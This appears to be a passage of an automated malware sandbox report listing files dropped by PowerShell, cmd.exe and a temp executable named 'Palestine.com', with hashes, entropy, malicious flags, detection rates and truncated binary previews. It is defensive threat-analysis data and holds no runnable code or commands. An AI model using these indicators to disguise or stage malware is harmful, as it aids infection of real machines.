                                                                                                                                                                                                                                        SHA-512:DFA4F89BDE35BA51F1871EAF57FDB3386883C5632848B115AC2C1F7F7C6DED0BF30640C2BDE260451FCB69F79D9A7EFA4B005D6FD5D7FD2EAB99964332BF3480
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........^.C?..C?..C?..JG..O?...M..D?..C?...?...J..b?...J..M?...J..J?...J..(?...J..B?...Jy.B?...J..B?..RichC?..................PE..d......e.........." .....,................................................... .......N....`A............................................t....................0..@........(......|.......p....................k..(...@...8............@...............................text....*.......,.................. ..`.rdata.......@.......0..............@..@.data....<..........................@....pdata..@....0......................@..@_RDATA..............................@..@.rsrc...............................@..@.reloc..|...........................@..B................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):339824
                                                                                                                                                                                                                                        Entropy (8bit):6.67232955431635
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:zLU98dTLLPTtdO37tzHzjRzPSzHKBJupBzC8vAocIGhL99WP+gDjX5oOyOta3H/C:P9PLrtShzHzjRMcQpsSCTO2H/Kj
                                                                                                                                                                                                                                        MD5:54EE6A204238313DC6ACA21C7E036C17
                                                                                                                                                                                                                                        SHA1:531FD1C18E2E4984C72334EB56AF78A1048DA6C7
                                                                                                                                                                                                                                        SHA-256:0ABF68B8409046A1555D48AC506FD26FDA4B29D8D61E07BC412A4E21DE2782FD
                                                                                                                                                                                                                                        SHA-512:19A2E371712AAB54B75059D39A9AEA6E7DE2EB69B3FFC0332E60DF617EBB9DE61571B2CA722CDDB75C9CBC79F8200D03F73539F21F69366EAE3C7641731C7820
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......|..8..U8..U8..U...U9..U...U=..U...U,..U8..Uo..U.c.U=..U.a.U9..U.c.U6..U.c.U?..U.c.U9..U.c.UY..U.c.U9..U.c.U9..URich8..U................PE..L....LF...........!.........x......(.............pZ.........................@...........................................}...[..........,...............p%......\7..X...8...............................@............................................text.............................. ..`.data...l7..........................@....rsrc...,...........................@..@.reloc..\7.......8..................@..B........................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):515272
                                                                                                                                                                                                                                        Entropy (8bit):7.005589549281488
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:K5NQiy4hbNqpbAuoa0MFsfFFWeRT7DwRgVpNtg+Oy+NJfOMBfcQ85VKo2qoT:K5NzhGstFWcW+g9OyGKoboT
                                                                                                                                                                                                                                        MD5:5C48918247C4F18AFF250A02430174C6
                                                                                                                                                                                                                                        SHA1:FDB3B1ECFE3BA516410143E32E20EC99C5D96F67
                                                                                                                                                                                                                                        SHA-256:3B3BE931FF4C9D587FC4D6FF91FF6EA978F21D032A22F1885AA357907DA60D75
                                                                                                                                                                                                                                        SHA-512:632502A628313A41FE765831C6AAE9CF23D8E73C4A1D756689FE6B2F5A694DC361FCC3721C3C903AC89E00E6BC1708AE0A3F95785D58C40B92FE2A434E00D550
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........:...i...i...i..Oi...i...i...i.@Bi...i.@vi8..i.@wi...i.@Gi...i.@Fi...i.@Ai...iRich...i........................PE..d.....OS.........." .................).......................................P......S/....@.................................................D...(.... ...........!...........0.......2...............................................0..@............................text...f........................... ..`.rdata..^....0......................@..@.data....b.......>..................@....pdata...!......."..................@..@text.................P..............@.. data.....A.......B...h..............@..@.rsrc........ ......................@..@.reloc.......0......................@..B................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):810320
                                                                                                                                                                                                                                        Entropy (8bit):6.207204782459616
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:2qjIhzdNvajtjz38HkZIbKnxPxlJsk7aMClZE:2qjIhzdNvkjGKP1I+
                                                                                                                                                                                                                                        MD5:EF66829B99BBFC465B05DC7411B0DCFA
                                                                                                                                                                                                                                        SHA1:C6F6275F92053B4B9FA8F2738ED3E84F45261503
                                                                                                                                                                                                                                        SHA-256:257E6489F5B733F2822F0689295A9F47873BE3CEC5F4A135CD847A2F2C82A575
                                                                                                                                                                                                                                        SHA-512:6839B7372E37E67C270A4225F91DF21F856158A292849DA2101C2978CE37CD08B75923AB30CA39D7360CE896FC6A2A2D646DD88EB2993CEF612C43A475FDB2EA
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Idc.(.0.(.0.(.0@.t0.(.0.'U0.(.0.(.0.).0.'W0.(.0..w0.(.0..g0v(.0..p0.(.0..d0.(.0@.O0.(.0..r0.(.0Rich.(.0................PE..L.....D...........!.....~........................P'.................................L......................................e..,.......@............B..P........p..................................._..@...............`............................text....|.......~.................. ..`.data...8L.......*..................@....rsrc...@...........................@..@.reloc.............................@..B........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):5729136
                                                                                                                                                                                                                                        Entropy (8bit):6.3266178693130755
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:49152:ERUl697ngPTrho9J8kgdjbHNZ5PP/Re5m3mxVN6KEp0v7J7k66ZRkQTXw+sljVop:uAXqnhON8m3mzNHTdw6YSX+sleu5y
                                                                                                                                                                                                                                        MD5:537915708FE4E81E18E99D5104B353ED
                                                                                                                                                                                                                                        SHA1:128DDB7096E5B748C72DC13F55B593D8D20AA3FB
                                                                                                                                                                                                                                        SHA-256:6DC7275F2143D1DE0CA66C487B0F2EBFF3D4C6A79684F03B9619BF23143ECF74
                                                                                                                                                                                                                                        SHA-512:9CEAAF7AA5889BE9F5606646403133782D004B9D78EF83D7007DFCE67C0F4F688D7931AEBC74F1FC30AAC2F1DD6281BDADFB52BC3EA46ACA33B334ADB4067AE2
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2...v..v..v.....b..Q..~.....w..Q..|..Q...A.....G..v.....Q......Q..w..v..w..Q..w..Richv..................PE..L...%.LF..................K..r......A*........O...@..........................`W......+X.......... ............................J.D.....T..............FW.p%............K.8...............................@.....................J......................text...:.K.......K................. ..`.data...P.....K.......K.............@....rsrc.........T......hT.............@..@........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):6751136
                                                                                                                                                                                                                                        Entropy (8bit):7.800052983990694
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:98304:35pmmvotTUS2vDBtB18Kw6q7m+8VkF0eP6f3Ixzt4BvpD/ryFo3OBF5kcUlOqZfB:pAKotTwVtZwEA0YE6+NyFo8UD2gfx
                                                                                                                                                                                                                                        MD5:72614F654C4B82D1B1EADC7F0A82BDFA
                                                                                                                                                                                                                                        SHA1:162528C6D749BD66F40C0826CBD64EBDA8F94E10
                                                                                                                                                                                                                                        SHA-256:C5583FF295CAB60C913D6DA7D8461B6697D7294F6CA308F49E65222E443B4890
                                                                                                                                                                                                                                        SHA-512:A5EE39E02FF427102AF8A3632D45B73359AB4ACA0DB53DA52166A293EE73BA155D5EDE3E404AC3C4E43B90A1179A255F96FC1F270A7898E94320CACD7F8C1F0E
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 48%
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........$...w...w...wy..w...wy..w...w...w...w.U.w...w-W.w...w.U.w...wy..w...wy..w...w.U.w...w.U.w...w.U.wE..w.U.w...w.U.w...wRich...w........PE..L.....LF...........!.................eb............Y.........................@g.....A.g..............................,......$.].T.....f...............f.......f....`...8...........................@rf.@............@C..............................text.............................. ..`.data....+......."..................@....data0...b4......d4................. ..`.data1.......@C.......C.............@....data2..P&#..PC..(#...C............. ..`.rsrc.........f......8f.............@..@.reloc.......f......>f.............@..B................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):626688
                                                                                                                                                                                                                                        Entropy (8bit):6.840096566307411
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:mxzh9hH5RVKTp0G+vFhr46CI600yZmGyYG:mph9hHzVKOpt6MmGyY
                                                                                                                                                                                                                                        MD5:43143ABB001D4211FAB627C136124A44
                                                                                                                                                                                                                                        SHA1:EDB99760AE04BFE68AAACF34EB0287A3C10EC885
                                                                                                                                                                                                                                        SHA-256:CB8928FF2FAF2921B1EDDC267DCE1BB64E6FEE4D15B68CD32588E0F3BE116B03
                                                                                                                                                                                                                                        SHA-512:CED96CA5D1E2573DBF21875CF98A8FCB86B5BCDCA4C041680A9CB87374378E04835F02AB569D5243608C68FEB2E9B30FFE39FEB598F5081261A57D1CE97556A6
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........L.........@................!......;.............d.......................Rich...................PE..L...I^j[...........!.....0...p......+#.......@.....x......................................@..........................q...~..Pc..<....`.......................p..P3...B...............................F..@............@...............................text....'.......0.................. ..`.rdata......@.......@..............@..@.data...Li.......P..................@....rsrc........`.......@..............@..@.reloc...7...p...@...P..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        File Type:DIY-Thermocam raw data (Lepton 2.x), scale 0-0, spot sensor temperature 222243615307464704.000000, unit celsius, color scheme 0, userbration: offset 0.000000, slope 2097169.750000
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):6015798
                                                                                                                                                                                                                                        Entropy (8bit):7.9812030497985536
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:98304:iReAn0Q7G9g0ORXr8d3UeNsnvkfNv2MDbDegTUdgW/jcThCZ5cJhEpQVAsVjdP:bY0QYghRXr8d3r6Wl2cbydcCZCwMP
                                                                                                                                                                                                                                        MD5:110F3FC1762468FE42EB1040E2445B24
                                                                                                                                                                                                                                        SHA1:B9D0F3342338C9BAA26BC502CCA3AD4218DC5AF6
                                                                                                                                                                                                                                        SHA-256:ECB71466BA2CC1B223FD83B4C4E47E975EAEE6E56A68028B70EE6F6EA9B77EA3
                                                                                                                                                                                                                                        SHA-512:B0825A6FB99D93D858DA0DEC2D9CEA6667426B89E3D84B96C2F725FFFDD7528FA30EFF31ECE5AF979398B53A617694AE1DEA6F8005F00AFA1A037599A74E06AA
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:..n.P.UCwHM.WP.dvM..[..x.i_.mLl....c......O..vU.a....i....twk..K..d`b..CJ...^...T`[.Rb..B....kL.B.N......VXPboC.Cb...q...hVu.gq..h..N..aA......yV.....KnX..p.....].n.WC].ED..l..SYoT.I...Lpa....[a..h.fV.YIHY.....r.XT.x.....k.v.\q.[Xa.HO..^.E.h..Zl.v.F.eI`..E...Es....rjL.F.K.M_j..b.GN.k.Nwpy..v..M..iB..O]H.hr..T...C.^vBhp.hMKF..A...[.]yE_ZH.AO.nPu_.....N..tU..a.Mbagn.iR....Cl..X..K...^..rsnUmWK.hG].......X..Z...V`[EX..nj.U.....w..j.....x........hdm..tETu....b.U.]..]T..V....S.h...WK.a...u.Y..bufP..D..bT.G.....\c._C.OeZ..^Mr..s.cB...VQu\..u.y....F.v..h.cC......ikDB.a.GKt..Q.F.\...f..a..tkF.....YQ..L.....Q.TZ...u.s.Y........cxFtN......xS..V.o...`yJ].RK....H^c.v.U....\c....k.FFpdH.mx..V..S..v..[...v._...F.YX...hbJhu...S.t...f.......Dbd.....XD\W].Hmo\.q..i..gT..f\.I..^cTsoWI.AtiD..D.s.D....MtOI.g.enl.Y.x.bGD.c.^nyp`t.d.N...lF.R.h.ftm..HTLp.BBI...N.MC..Zo.ig...iNQ.P...sc..yM..a...uxPo...p.NF.`...M.....GdH.Pg.P`.NIY.H...gbhW..U.bc...Vu.fpDH.Cy.....A.ToK.Zbm..v.nwvU...sc.G...qUSk...fO.PY\hAYHM..r
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1046528
                                                                                                                                                                                                                                        Entropy (8bit):6.203517479529882
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24576:W35vXxybQcMYjPvBH2VsJzwRBPrxKIQg6F:WJ/AbFjr+PrxKIp
                                                                                                                                                                                                                                        MD5:5262795822926C515042CAAB4D8604D8
                                                                                                                                                                                                                                        SHA1:FB4137F82C67B05C3D3EE9BCF0F0778001B41A60
                                                                                                                                                                                                                                        SHA-256:8E2C94CE0A149047B45652C8D22428E9FF3834CB7328E28EDD33DEB5D9D06ECA
                                                                                                                                                                                                                                        SHA-512:EB21CEA2346D56F78912742E177DA651F98B6FF3217A3B40BF0617ED7FF1A7F905FF07C8CDCE03F0C9B233818F2FD002AA59DA288065FA1543F46FCCE868BD13
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........p...#...#...#..j#..#..."...#...#u..#..."...#..."...#..."...#..."...#..."...#...#...#..."...#Rich...#........PE..d...[\............" .....~..................................................@............`A................................................h................P............... .........T.......................(..................`.......(........................text....}.......~.................. ..`.rdata...y.......z..................@..@.data....=.......*..................@....pdata.......P.......&..............@..@.didat..8...........................@....rsrc...............................@..@.reloc....... ......................@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):71499
                                                                                                                                                                                                                                        Entropy (8bit):4.4398294453833795
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:Ick5oY4q7NoIO0WXLaawaVeXzEbpbBWFNcd00ZK7iP+j9:IbR4q7NoIEFVeEFkcd0002P+j9
                                                                                                                                                                                                                                        MD5:E96CD0CAD852FE12F4476403099FABB2
                                                                                                                                                                                                                                        SHA1:DA06AA5EAD8232C934F4A63B1E4097B3ACDC0B10
                                                                                                                                                                                                                                        SHA-256:3917C00F233C165A4E2C59712D1E15C24A5702C9B65E22D583F6EA04242F67E4
                                                                                                                                                                                                                                        SHA-512:4D50D18E9D63D922FE0F5D7C0A9654A1E1387F162A49B7DB3D9FECBA8185685A4E159D78AB69D3015D983AC1B19CDD5AE026616D0802620BE3D148E8B1B4956A
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:...v..y...p.nd...nP.x....F.f..pC....j.b.LXn..G.O.J..v.V..F.flHE.EIP.u....P.v..s....._i..jSyw.W.t.O.HeU.`Qa.we.I..Ho..QC.S.Dc....ZZ.Obgr..dP..nqvRvQnk.O.ttmW.C.I.rK...t...F]p.].F.Dj.m.PT.WqBAd.BH.J.N.t.OF.I....WpOJe...oIw..F.K.ugS.]H...T.u...E....fb..V.N......ORg.....CQ^h`iA...hE...^]P`.Ymgv..e.m..r.k..D._..P..O.v.In.SI[.Oe`K.W]L.b..SZQB.Wu....Q...FD...d.qF...gJTZ.SR.Vh..s...D`X.y...y.CmjGqZ.I.H.k..Y..bZvbC...c.P.Y.....qMHA.Q...Vp.^..HFKSU.k.h.B_...Z.R..m..Ig..M.HF.k.Y...W.Eo`.._ot..J..gsem]Zv..L\del.HFL..S]......i..h.A.rG..F]tm.OG.uA_.p.J.US.rg.Vc.W.U....X.^^_..o..KPn....A.a.C\.x..ix....f...AGAFApHq......y.Uy.....c..h..V.....L.lJm.....E^....^.....I.uk..b.nPX.V....V..F...a...N..v...C.lL.bAXH.I....cuFl...i..Yt.HU.mB.Th.Au.x..i.sfeq..dc.h[.....B..WxI^GU.tCCE...c_.MKc.....J.mD...W^.xoIyS..q.gx..F..BSgLI.].N...KR.nw..Tr.hb\Tv..g..k..vb.....OC.^y..I.b.FOfm..e..Atk[....ZE.k...LmxQc.Z...^mh.J...x.B.rWG`....j..Ed..oK.y_...nmQf......JZ_Q..Cm.J...j.......W.Y..G.PuC[TN..H...c...J.HF]....k...Aq...R
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):8003
                                                                                                                                                                                                                                        Entropy (8bit):4.840877972214509
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
                                                                                                                                                                                                                                        MD5:106D01F562D751E62B702803895E93E0
                                                                                                                                                                                                                                        SHA1:CBF19C2392BDFA8C2209F8534616CCA08EE01A92
                                                                                                                                                                                                                                        SHA-256:6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
                                                                                                                                                                                                                                        SHA-512:81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):19484
                                                                                                                                                                                                                                        Entropy (8bit):5.6095636822181225
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:IvuTdkXo4rmYEWhzWpBMiXJC78xz684O1rn2XrCQwiaVji6F7OP9hDGuhcO:t5q2cqpyiXUcu8Jr6rfaNil9wO
                                                                                                                                                                                                                                        MD5:55D5EC59A903D85C501CBDC9AA814580
                                                                                                                                                                                                                                        SHA1:0BDDDCDCE0BF8F17EC31C4089F0B8CFC4B245618
                                                                                                                                                                                                                                        SHA-256:50491D50A591DFE3A7F9144B673B78C7AD18818438B5970951D8F3B15E57FA6D
                                                                                                                                                                                                                                        SHA-512:1FCF7FB8B138A7426A332F984EFF5411C08CCE9773DA0CADCE69249F2536EC3BD4C29A8743449C73EC526BCB18433D1CB98429C723C3685750838603C8EC3E5E
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:@...e.....................L.m.`...../.X..............@..........H...............o..b~.D.poM...&..... .Microsoft.PowerShell.ConsoleHostD...............4..7..D.#V.............System.Management.Automation4...............<."..Ke@...j..........System.Core.0.................Vn.F..kLsw..........System..4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.@................z.U..G...5.f.1........System.DirectoryServices<................t.,.lG....M...........System.Management...4..................~..2K..}...0".......System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Utility...D....................+.H..!...e........System.Configuration.Ins
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\650429\Palestine.com
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):18610385
                                                                                                                                                                                                                                        Entropy (8bit):7.988718937379966
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:393216:/AsuyDZ9JgjA3J3f0jec34HR0h72YZY4GO79KRaCwGt3xdBYDum1k:YK95ZsL4H6hdnGRgGbBYDm
                                                                                                                                                                                                                                        MD5:0EFDBBF3F5074D596D3E61446B623942
                                                                                                                                                                                                                                        SHA1:EC206D4E793A203DF221F456FD9E626EB3E8D9EC
                                                                                                                                                                                                                                        SHA-256:85082DA27713BE48EF8CE523370111F97F0A54E2BE4CECE2463CC5671513B4C4
                                                                                                                                                                                                                                        SHA-512:C3312A6C26455EBD86683058D4E7C49D6D92EBB42CC617A559317DE11FA54CAB7B45C8A7CC114F73DC295E68A977382F846BD2F662AF89AC918AF3A59566E5C9
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 18%
                                                                                                                                                                                                                                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f.................t...p....................@..................................'....@......@...................p..q....P......................y...XG...........................................................R..\....`.......................text....V.......X.................. ..`.itext..d....p.......\.............. ..`.data...88.......:...x..............@....bss....Xr...............................idata.......P......................@....didata......`......................@....edata..q....p......................@..@.tls.....................................rdata..]...........................@..@.reloc..............................@..B.rsrc...............................@..@....................................@..@................
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):474688
                                                                                                                                                                                                                                        Entropy (8bit):7.999593154939864
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:12288:fOvJBeffP+z4BVPm23TOAFtKINL2lRll7a:Gv7enWzK3Txu7Va
                                                                                                                                                                                                                                        MD5:9B83BF7CADD60D542183F587AE07E092
                                                                                                                                                                                                                                        SHA1:8907A315D781DE77093057CE4A43A190D00B5284
                                                                                                                                                                                                                                        SHA-256:F0F666D158614CC2C05EC0F6C428FF2A4C483F05B2A03F7F0A9A6AC600B9B22D
                                                                                                                                                                                                                                        SHA-512:9F6AB45BDA0CA346366EA6B6BD125F836D30808D4BE4D61C37954ED84454AED2DFDE5F5F9FE5B8AC6C91E26AB254373EC71E77238DE09ADF3A3AFAC7C6FB7C11
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:..MFX..MK.-q.......U..1.p..&...$:...@.E~.;.....w0..V.....J&va......`O.e`........d.R..4X..W..f..#$.s.F)....1.Wx..Q...-j....Q.f=.....:..l...&...=%y{.o.'k.0.5.Op.G...y.3...\...r/.....2^U....P.,...U.Q}..H0..8D....!.a...+8..Eb$...9.Y.J[y.R...E.0duK.h.?.......=]xPYd....5...,d....7.cEjk..G.v.`./...U..3.|`.|...........K.OX.H*,\.oBI...0f...o....Z.....Jd.t.R4.~...'E...../.p6J..=.w.z....#.{c..H.!6F....O=L.ad...,..d.(.d.b?*.RsT...?.._^.~..u.T.l.N}r..rP. .B..`gH.i..lk...N~...X..%........Q....wehM...m.d$.)}.=.O...4Q...q.<4....,..Q{C...8...~...D...B..Po)1ON..PkMQ.o.....0.U....e.q$.*..A.'..-&?\o.9j.....|..|../g.)...&.b...'..p(b"..JuL..X.hwmP...+......<...........3....C^r..|.L..Z..5.l..B..."W.R...9.'...Q........~f......;..o...X[!.t..O...'g............y.>....\G.W..kwR>..$..{Z.........N~..pa.7.a.+.hF...xT.....$?...Q3o.(.>._.".p..{]y..._.....L"....../?rN..28..,W..".M>.@#_8>...-.y.?.K...........@....{..9.....4...|]...b.)C...j.p`[6..~.HK..lJ..LS...H}AU3!EA
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                        Size (bytes):947288
                                                                                                                                                                                                                                        Entropy (8bit):6.630612696399572
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
                                                                                                                                                                                                                                        MD5:62D09F076E6E0240548C2F837536A46A
                                                                                                                                                                                                                                        SHA1:26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
                                                                                                                                                                                                                                        SHA-256:1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                                                                                                                                                                                                                                        SHA-512:32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):18817091
                                                                                                                                                                                                                                        Entropy (8bit):7.998043677768579
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:393216:vOHdml+PI32WVBE+T/z56UZjx+/vLh2MYmE+eBeChXOE3gb/D9xqx:viml+g3lVBEIr5lWQM5Ezb3Kz2
                                                                                                                                                                                                                                        MD5:B3923A3753F6CFB886CB3C0EB9A482EB
                                                                                                                                                                                                                                        SHA1:4E32830B43642D0E16A0DB0FDC22C22054A5A798
